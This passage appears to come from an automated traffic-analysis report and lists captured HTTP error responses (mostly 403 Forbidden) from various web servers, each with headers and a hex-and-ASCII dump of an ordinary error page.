                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:07 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMepe296fMW5KF9VDXVotyUV,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1690487647.25718672555416314X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:07 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=14X-Shopify-Stage: canaryX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 4601af9a-fd5b-4cd5-b995-99f7431c4671CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oY79ijUijvgEj%2BJE45RC6gD1mrZyx6LIO9EnQGORbTmhko0DtPkXaEMmbieevMGnIsDyV2jDenj0Ed9NTvNo3H48LqzT0xoVqChblnFZRs8USxwqHNCWlJlPxIzTGHs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.999929Server: cloudflareCF-RAY: 7ed76eb37a6e3834-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:07 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:07 GMTServer: ApacheLast-Modified: Fri, 10 Jun 2022 17:11:43 GMTETag: "2c8-5e11b08540544"Accept-Ranges: bytesContent-Length: 712Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 2d 4d 53 43 50 20 69 6e 74 65 72 6e 65 74 20 2d 20 4d 75 6c 74 69 20 53 65 72 76 65 72 20 43 6f 6e 74 72 6f 6c 20 50 61 6e 65 6c 20 2d 20 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 4d 53 43 50 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6e 64 65 78 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 65 72 72 6f 72 64 6f 63 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 28 49 45 20 37 29 7c 28 49 45 20 38 29 5d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 73 2f 69 6e 63 2f 69 65 37 38 6f 76 65 72 72 69 64 65 73 2e 63 73 73 22 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6f 75 74 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 33 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 62 61 63 6b 6c 69 6e 6b 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 67 6f 28 2d 32 29 22 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 42 61 63 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <title>i-MSCP internet - Multi Server Control Panel - Error 403</title> <meta charset="utf-8"> <meta name="application-name" content="i-MSCP"> <meta name='robots' content='nofollow, noindex'> <link rel="icon" href="/errors/inc/favicon.ico"> <link rel="stylesheet" href="/errors/inc/errordocs.css"> <!--[if (IE 7)|(IE 8)]> <link rel="stylesheet" href="/errors/inc/ie78overrides.css"> <![endif]--></head><body><div id="outer"> <div id="inner"> <h1>Error 403</h1> <p>Fo
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:07 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:07 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGEX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: eb7ca7545ba2ee6729017b2bd2d3360f104a03bcDate: Thu, 27 Jul 2023 19:54:08 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 36 35 36 38 22 2c 20 31 36 39 30 34 38 37 36 34 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 37 35 34 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 39 39 36 34 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 35 36 3a 30 38 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC6568", 1690487648, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690487548 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Thu, 27 Jul 2023 19:54:08 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:54:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=20X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: f6212c5c-c87b-43b1-982f-180b8c7398d2CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aN18IyTZKwfSKoOFstnRaXywSsLKs41J2RLtKawLh%2FHWZlSpgRU1ruRmJg%2F84fD9JuXXoD4lKua7Nd%2Fyu1OuHAsyx%2BI00TxJri2LqhiOIB4ZZip5QigW03bPr1%2FIgf54%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=154.999971Server: cloudflareCF-RAY: 7ed76ebbcb449271-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:54:09 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:54:10 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 